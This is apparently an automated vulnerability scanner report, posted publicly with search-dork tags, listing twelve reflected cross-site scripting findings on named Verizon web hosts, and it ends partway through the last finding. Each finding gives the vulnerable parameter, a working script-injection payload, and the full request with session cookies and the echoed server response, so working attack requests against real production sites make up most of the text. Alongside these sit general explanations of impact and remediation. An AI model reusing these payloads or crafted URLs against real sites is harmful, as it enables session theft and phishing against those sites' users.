verizon.com, XSS, CWE-79, CAPEC-86, Cross Site Scripting, DORK, Unforgivable Vulnerabilities

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Remediation background

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defenses:

Input should be validated as strictly as possible on arrival, given the kind of content which it is expected to contain. For example, personal names should consist of alphabetical and a small range of typographical characters, and be relatively short; a year of birth should consist of exactly four numerals; email addresses should match a well-defined regular expression. Input which fails the validation should be rejected, not sanitised.
User input should be HTML-encoded at any point where it is copied into application responses. All HTML metacharacters, including < > " ' and =, should be replaced with the corresponding HTML entities (< > etc).

In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.

1.1. http://syndicate.verizon.net/ads/js.ashx [page parameter] next

Summary

Severity:	High
Confidence:	Certain
Host:	http://syndicate.verizon.net
Path:	/ads/js.ashx

Issue detail

The value of the page request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6ca72\'%3balert(1)//bbca0934e38 was submitted in the page parameter. This input was echoed as 6ca72\\';alert(1)//bbca0934e38 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string the the backslash character should be blocked, or escaped by replacing it with two backslashes.

Request

GET /ads/js.ashx?page=vznewsroom.net/homepage.html6ca72\'%3balert(1)//bbca0934e38&pos=Top1,x20,x21,x37,x38,x48,x49,x50,Right1 HTTP/1.1
Accept: */*
Referer: http://www.verizon.net/newsroom/portals/newsroom.portal
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Host: syndicate.verizon.net
Proxy-Connection: Keep-Alive
Pragma: no-cache

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/plain; charset=utf-8
Content-Length: 2442
Date: Sat, 20 Nov 2010 01:34:44 GMT
Connection: close

//Copyright (c) 2000-2003 by 24/7 Real Media, Inc. ALL RIGHTS RESERVED. 3/13/2008
//New changes made on 06/25 and pushed to fuat on 06/25
//configuration
OAS_url = 'http://oascentral.verizononline.com/RealMedia/ads/';
OAS_sitepage = 'vznewsroom.net/homepage.html6ca72\\';alert(1)//bbca0934e38';
OAS_listpos = 'Top1,x20,x21,x37,x38,x48,x49,x50,Right1';
OAS_query = 'search=';
OAS_target = '_blank';
OAS_RegLocurl = 'http://syndicate.verizon.net/ads/regionlocator.ashx';
OAS_SynHandlerurl =
...[SNIP]...

1.2. http://syndicate.verizon.net/ads/js.ashx [pos parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://syndicate.verizon.net
Path:	/ads/js.ashx

Issue detail

The value of the pos request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e4c6c\'%3balert(1)//dc500af93ec was submitted in the pos parameter. This input was echoed as e4c6c\\';alert(1)//dc500af93ec in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Remediation detail

Request

GET /ads/js.ashx?page=vznewsroom.net/homepage.html&pos=Top1,x20,x21,x37,x38,x48,x49,x50,Right1e4c6c\'%3balert(1)//dc500af93ec HTTP/1.1
Accept: */*
Referer: http://www.verizon.net/newsroom/portals/newsroom.portal
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Host: syndicate.verizon.net
Proxy-Connection: Keep-Alive
Pragma: no-cache

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/plain; charset=utf-8
Content-Length: 2442
Date: Sat, 20 Nov 2010 01:34:49 GMT
Connection: close

//Copyright (c) 2000-2003 by 24/7 Real Media, Inc. ALL RIGHTS RESERVED. 3/13/2008
//New changes made on 06/25 and pushed to fuat on 06/25
//configuration
OAS_url = 'http://oascentral.verizononline.com/RealMedia/ads/';
OAS_sitepage = 'vznewsroom.net/homepage.html';
OAS_listpos = 'Top1,x20,x21,x37,x38,x48,x49,x50,Right1e4c6c\\';alert(1)//dc500af93ec';
OAS_query = 'search=';
OAS_target = '_blank';
OAS_RegLocurl = 'http://syndicate.verizon.net/ads/regionlocator.ashx';
OAS_SynHandlerurl = 'http://syndicate.verizon.net/ads/scripthandler.ashx?sour
...[SNIP]...

1.3. http://www.verizon.net/central/bookmark [_nfpb parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.verizon.net
Path:	/central/bookmark

Issue detail

The value of the _nfpb request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1d15b"-alert(1)-"b869bfbf83e was submitted in the _nfpb parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /central/bookmark?action=advancedwebsearch&_nfpb=true1d15b"-alert(1)-"b869bfbf83e&_pageLabel=google_advanced&web_search_type=advanced&clientid=cnsmr&channel=nwsrm HTTP/1.1
Accept: */*
Referer: http://www.verizon.net/newsroom/portals/newsroom.portal
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Host: www.verizon.net
Proxy-Connection: Keep-Alive
Pragma: no-cache
Cookie: NEWSROOMAPPID=VwFLMnkTyH20DqvLSF6hL44LhDxMvPjQvlqYLB393sGyQ6Jxk2P1!1302713187; ASPSESSIONIDCSRRSSBB=LHMJJEBDLLGALEMOCNNEADHI; VZCSESSIONID=dWlNMnkNBD0kwwJSd2F2Gk0j8TqjMCnL1qFZKhHTqRwJYyGxnGQx!133454377

Response

HTTP/1.1 200 OK
Server: Apache
Content-Length: 257
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: policyref="/w3c/p3p.xml", CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Content-Type: text/html;charset=UTF-8
Expires: Sat, 20 Nov 2010 01:34:51 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 20 Nov 2010 01:34:51 GMT
Connection: close
Vary: Accept-Encoding

<script>
window.location = "http://www.verizon.net/central/vzc.portal?_nfpb=true&_pageLabel=google_advanced&_nfpb=true1d15b"-alert(1)-"b869bfbf83e&_pageLabel=google_advanced&web_search_type=advanced&clientid=cnsmr&channel=nwsrm";
</script>

1.4. http://www.verizon.net/central/bookmark [_pageLabel parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.verizon.net
Path:	/central/bookmark

Issue detail

The value of the _pageLabel request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c20e3"-alert(1)-"c6f3d98f7be was submitted in the _pageLabel parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /central/bookmark?action=advancedwebsearch&_nfpb=true&_pageLabel=google_advancedc20e3"-alert(1)-"c6f3d98f7be&web_search_type=advanced&clientid=cnsmr&channel=nwsrm HTTP/1.1
Accept: */*
Referer: http://www.verizon.net/newsroom/portals/newsroom.portal
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Host: www.verizon.net
Proxy-Connection: Keep-Alive
Pragma: no-cache
Cookie: NEWSROOMAPPID=VwFLMnkTyH20DqvLSF6hL44LhDxMvPjQvlqYLB393sGyQ6Jxk2P1!1302713187; ASPSESSIONIDCSRRSSBB=LHMJJEBDLLGALEMOCNNEADHI; VZCSESSIONID=dWlNMnkNBD0kwwJSd2F2Gk0j8TqjMCnL1qFZKhHTqRwJYyGxnGQx!133454377

Response

HTTP/1.1 200 OK
Server: Apache
Content-Length: 257
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: policyref="/w3c/p3p.xml", CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Content-Type: text/html;charset=UTF-8
Expires: Sat, 20 Nov 2010 01:34:54 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 20 Nov 2010 01:34:54 GMT
Connection: close
Vary: Accept-Encoding

<script>
window.location = "http://www.verizon.net/central/vzc.portal?_nfpb=true&_pageLabel=google_advanced&_nfpb=true&_pageLabel=google_advancedc20e3"-alert(1)-"c6f3d98f7be&web_search_type=advanced&clientid=cnsmr&channel=nwsrm";
</script>

1.5. http://www.verizon.net/central/bookmark [channel parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.verizon.net
Path:	/central/bookmark

Issue detail

The value of the channel request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 11336"-alert(1)-"6e3d0de664f was submitted in the channel parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /central/bookmark?action=advancedwebsearch&_nfpb=true&_pageLabel=google_advanced&web_search_type=advanced&clientid=cnsmr&channel=nwsrm11336"-alert(1)-"6e3d0de664f HTTP/1.1
Accept: */*
Referer: http://www.verizon.net/newsroom/portals/newsroom.portal
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Host: www.verizon.net
Proxy-Connection: Keep-Alive
Pragma: no-cache
Cookie: NEWSROOMAPPID=VwFLMnkTyH20DqvLSF6hL44LhDxMvPjQvlqYLB393sGyQ6Jxk2P1!1302713187; ASPSESSIONIDCSRRSSBB=LHMJJEBDLLGALEMOCNNEADHI; VZCSESSIONID=dWlNMnkNBD0kwwJSd2F2Gk0j8TqjMCnL1qFZKhHTqRwJYyGxnGQx!133454377

Response

HTTP/1.1 200 OK
Server: Apache
Content-Length: 257
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: policyref="/w3c/p3p.xml", CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Content-Type: text/html;charset=UTF-8
Expires: Sat, 20 Nov 2010 01:34:57 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 20 Nov 2010 01:34:57 GMT
Connection: close
Vary: Accept-Encoding

<script>
window.location = "http://www.verizon.net/central/vzc.portal?_nfpb=true&_pageLabel=google_advanced&_nfpb=true&_pageLabel=google_advanced&web_search_type=advanced&clientid=cnsmr&channel=nwsrm11336"-alert(1)-"6e3d0de664f";
</script>

1.6. http://www.verizon.net/central/bookmark [clientid parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.verizon.net
Path:	/central/bookmark

Issue detail

The value of the clientid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ee2b1"-alert(1)-"0bcef26108 was submitted in the clientid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /central/bookmark?action=advancedwebsearch&_nfpb=true&_pageLabel=google_advanced&web_search_type=advanced&clientid=cnsmree2b1"-alert(1)-"0bcef26108&channel=nwsrm HTTP/1.1
Accept: */*
Referer: http://www.verizon.net/newsroom/portals/newsroom.portal
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Host: www.verizon.net
Proxy-Connection: Keep-Alive
Pragma: no-cache
Cookie: NEWSROOMAPPID=VwFLMnkTyH20DqvLSF6hL44LhDxMvPjQvlqYLB393sGyQ6Jxk2P1!1302713187; ASPSESSIONIDCSRRSSBB=LHMJJEBDLLGALEMOCNNEADHI; VZCSESSIONID=dWlNMnkNBD0kwwJSd2F2Gk0j8TqjMCnL1qFZKhHTqRwJYyGxnGQx!133454377

Response

HTTP/1.1 200 OK
Server: Apache
Content-Length: 256
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: policyref="/w3c/p3p.xml", CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Content-Type: text/html;charset=UTF-8
Expires: Sat, 20 Nov 2010 01:34:56 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 20 Nov 2010 01:34:56 GMT
Connection: close
Vary: Accept-Encoding

<script>
window.location = "http://www.verizon.net/central/vzc.portal?_nfpb=true&_pageLabel=google_advanced&_nfpb=true&_pageLabel=google_advanced&web_search_type=advanced&clientid=cnsmree2b1"-alert(1)-"0bcef26108&channel=nwsrm";
</script>

1.7. http://www.verizon.net/central/bookmark [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.verizon.net
Path:	/central/bookmark

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2f413"-alert(1)-"17d6cf30d2f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /central/bookmark?action=advancedwebsearch&_nfpb=true&_pageLabel=google_advanced&web_search_type=advanced&clientid=cnsmr&channel=nwsrm&2f413"-alert(1)-"17d6cf30d2f=1 HTTP/1.1
Accept: */*
Referer: http://www.verizon.net/newsroom/portals/newsroom.portal
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Host: www.verizon.net
Proxy-Connection: Keep-Alive
Pragma: no-cache
Cookie: NEWSROOMAPPID=VwFLMnkTyH20DqvLSF6hL44LhDxMvPjQvlqYLB393sGyQ6Jxk2P1!1302713187; ASPSESSIONIDCSRRSSBB=LHMJJEBDLLGALEMOCNNEADHI; VZCSESSIONID=dWlNMnkNBD0kwwJSd2F2Gk0j8TqjMCnL1qFZKhHTqRwJYyGxnGQx!133454377

Response

HTTP/1.1 200 OK
Server: Apache
Content-Length: 260
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: policyref="/w3c/p3p.xml", CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Content-Type: text/html;charset=UTF-8
Expires: Sat, 20 Nov 2010 01:34:59 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 20 Nov 2010 01:34:59 GMT
Connection: close
Vary: Accept-Encoding

<script>
window.location = "http://www.verizon.net/central/vzc.portal?_nfpb=true&_pageLabel=google_advanced&_nfpb=true&_pageLabel=google_advanced&web_search_type=advanced&clientid=cnsmr&channel=nwsrm&2f413"-alert(1)-"17d6cf30d2f=1";
</script>

1.8. http://www.verizon.net/central/bookmark [web_search_type parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.verizon.net
Path:	/central/bookmark

Issue detail

The value of the web_search_type request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ae787"-alert(1)-"efdc3db1e0c was submitted in the web_search_type parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /central/bookmark?action=advancedwebsearch&_nfpb=true&_pageLabel=google_advanced&web_search_type=advancedae787"-alert(1)-"efdc3db1e0c&clientid=cnsmr&channel=nwsrm HTTP/1.1
Accept: */*
Referer: http://www.verizon.net/newsroom/portals/newsroom.portal
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Host: www.verizon.net
Proxy-Connection: Keep-Alive
Pragma: no-cache
Cookie: NEWSROOMAPPID=VwFLMnkTyH20DqvLSF6hL44LhDxMvPjQvlqYLB393sGyQ6Jxk2P1!1302713187; ASPSESSIONIDCSRRSSBB=LHMJJEBDLLGALEMOCNNEADHI; VZCSESSIONID=dWlNMnkNBD0kwwJSd2F2Gk0j8TqjMCnL1qFZKhHTqRwJYyGxnGQx!133454377

Response

HTTP/1.1 200 OK
Server: Apache
Content-Length: 257
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: policyref="/w3c/p3p.xml", CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Content-Type: text/html;charset=UTF-8
Expires: Sat, 20 Nov 2010 01:34:55 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 20 Nov 2010 01:34:55 GMT
Connection: close
Vary: Accept-Encoding

<script>
window.location = "http://www.verizon.net/central/vzc.portal?_nfpb=true&_pageLabel=google_advanced&_nfpb=true&_pageLabel=google_advanced&web_search_type=advancedae787"-alert(1)-"efdc3db1e0c&clientid=cnsmr&channel=nwsrm";
</script>

1.9. http://www.verizonwireless.com/b2c/store/controller [action parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.verizonwireless.com
Path:	/b2c/store/controller

Issue detail

The value of the action request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b1a0a"><script>alert(1)</script>ce4edd3e009 was submitted in the action parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /b2c/store/controller?item=phoneFirst&action=viewPhoneOverviewByDeviceb1a0a"><script>alert(1)</script>ce4edd3e009&deviceType=Phones&sortOption=priceSort HTTP/1.1
Host: www.verizonwireless.com
Proxy-Connection: keep-alive
Referer: http://www.verizonwireless.com/b2c/index.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NSC_xxx_hwt=ec2016f80000; GLOBALID=Gz%2FEvEpqLXlWjN0JBQtocFAw%2FxYn5zkIiHwVedAP2GenfEoJGe6sl1Ton8E00phs; JSESSIONIDB2C=Gh9nMnmL11xTTHL7LDVGFcCDpnlRydc1lJhhX2cm4wqp2f4WLLsH!-1044347078!saturn!5103!-1; NSC_xxx_xmt_c2d_mcwt=44ac3f0d25df

Response

HTTP/1.1 200 OK
Cache-Control: no-cache="Set-Cookie"
Date: Sat, 20 Nov 2010 01:39:04 GMT
Content-Type: text/html; charset=ISO-8859-1
Set-Cookie: SESSION_VALUE=Gh9nMnmL11xTTHL7LDVGFcCDpnlRydc1lJhhX2cm4wqp2f4WLLsH!-1044347078!saturn!5103!-1!1290217131032; domain=www.verizonwireless.com; path=/
Set-Cookie: TIME_CHECKER=1290217144943; domain=www.verizonwireless.com; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Length: 22014

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<htm
...[SNIP]...
<input type="hidden" name="query" value="go=/store/controller&item=phoneFirst&action=viewPhoneOverviewByDeviceb1a0a"><script>alert(1)</script>ce4edd3e009&deviceType=Phones&sortOption=priceSort" />
...[SNIP]...

1.10. http://www.verizonwireless.com/b2c/store/controller [deviceType parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.verizonwireless.com
Path:	/b2c/store/controller

Issue detail

The value of the deviceType request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 637b8"><script>alert(1)</script>f8543ce74dd was submitted in the deviceType parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /b2c/store/controller?item=phoneFirst&action=viewPhoneOverviewByDevice&deviceType=Phones637b8"><script>alert(1)</script>f8543ce74dd&sortOption=priceSort HTTP/1.1
Host: www.verizonwireless.com
Proxy-Connection: keep-alive
Referer: http://www.verizonwireless.com/b2c/index.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NSC_xxx_hwt=ec2016f80000; GLOBALID=Gz%2FEvEpqLXlWjN0JBQtocFAw%2FxYn5zkIiHwVedAP2GenfEoJGe6sl1Ton8E00phs; JSESSIONIDB2C=Gh9nMnmL11xTTHL7LDVGFcCDpnlRydc1lJhhX2cm4wqp2f4WLLsH!-1044347078!saturn!5103!-1; NSC_xxx_xmt_c2d_mcwt=44ac3f0d25df

Response

HTTP/1.1 200 OK
Cache-Control: no-cache="Set-Cookie"
Date: Sat, 20 Nov 2010 01:39:07 GMT
Content-Type: text/html; charset=ISO-8859-1
Set-Cookie: SESSION_VALUE=Gh9nMnmL11xTTHL7LDVGFcCDpnlRydc1lJhhX2cm4wqp2f4WLLsH!-1044347078!saturn!5103!-1!1290217131032; domain=www.verizonwireless.com; path=/
Set-Cookie: TIME_CHECKER=1290217147101; domain=www.verizonwireless.com; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Length: 22014

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<htm
...[SNIP]...
<input type="hidden" name="query" value="go=/store/controller&item=phoneFirst&action=viewPhoneOverviewByDevice&deviceType=Phones637b8"><script>alert(1)</script>f8543ce74dd&sortOption=priceSort" />
...[SNIP]...

1.11. http://www.verizonwireless.com/b2c/store/controller [item parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.verizonwireless.com
Path:	/b2c/store/controller

Issue detail

The value of the item request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dba5a"><script>alert(1)</script>70fff072cf3 was submitted in the item parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /b2c/store/controller?item=phoneFirstdba5a"><script>alert(1)</script>70fff072cf3&action=viewPhoneOverviewByDevice&deviceType=Phones&sortOption=priceSort HTTP/1.1
Host: www.verizonwireless.com
Proxy-Connection: keep-alive
Referer: http://www.verizonwireless.com/b2c/index.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NSC_xxx_hwt=ec2016f80000; GLOBALID=Gz%2FEvEpqLXlWjN0JBQtocFAw%2FxYn5zkIiHwVedAP2GenfEoJGe6sl1Ton8E00phs; JSESSIONIDB2C=Gh9nMnmL11xTTHL7LDVGFcCDpnlRydc1lJhhX2cm4wqp2f4WLLsH!-1044347078!saturn!5103!-1; NSC_xxx_xmt_c2d_mcwt=44ac3f0d25df

Response

HTTP/1.1 200 OK
Cache-Control: no-cache="Set-Cookie"
Date: Sat, 20 Nov 2010 01:39:02 GMT
Content-Type: text/html; charset=ISO-8859-1
Set-Cookie: SESSION_VALUE=Gh9nMnmL11xTTHL7LDVGFcCDpnlRydc1lJhhX2cm4wqp2f4WLLsH!-1044347078!saturn!5103!-1!1290217131032; domain=www.verizonwireless.com; path=/
Set-Cookie: TIME_CHECKER=1290217142586; domain=www.verizonwireless.com; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Length: 22014

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<htm
...[SNIP]...
<input type="hidden" name="query" value="go=/store/controller&item=phoneFirstdba5a"><script>alert(1)</script>70fff072cf3&action=viewPhoneOverviewByDevice&deviceType=Phones&sortOption=priceSort" />
...[SNIP]...

1.12. http://www.verizonwireless.com/b2c/store/controller [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.verizonwireless.com
Path:	/b2c/store/controller

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 965b3"><script>alert(1)</script>021e0c9eefd was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /b2c/store/controller?item=phoneFirst&action=viewPhoneOverviewByDevice&deviceType=Phones&sortOption=priceSort&965b3"><script>alert(1)</script>021e0c9eefd=1 HTTP/1.1
Host: www.verizonwireless.com
Proxy-Connection: keep-alive
Referer: http://www.verizonwireless.com/b2c/index.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NSC_xxx_hwt=ec2016f80000; GLOBALID=Gz%2FEvEpqLXlWjN0JBQtocFAw%2FxYn5zkIiHwVedAP2GenfEoJGe6sl1Ton8E00phs; JSESSIONIDB2C=Gh9nMnmL11xTTHL7LDVGFcCDpnlRydc1lJhhX2cm4wqp2f4WLLsH!-1044347078!saturn!5103!-1; NSC_xxx_xmt_c2d_mcwt=44ac3f0d25df

Response

HTTP/1.1 200 OK
Cache-Control: no-cache="Set-Cookie"
Date: Sat, 20 Nov 2010 01:39:09 GMT
Content-Type: text/html; charset=ISO-8859-1
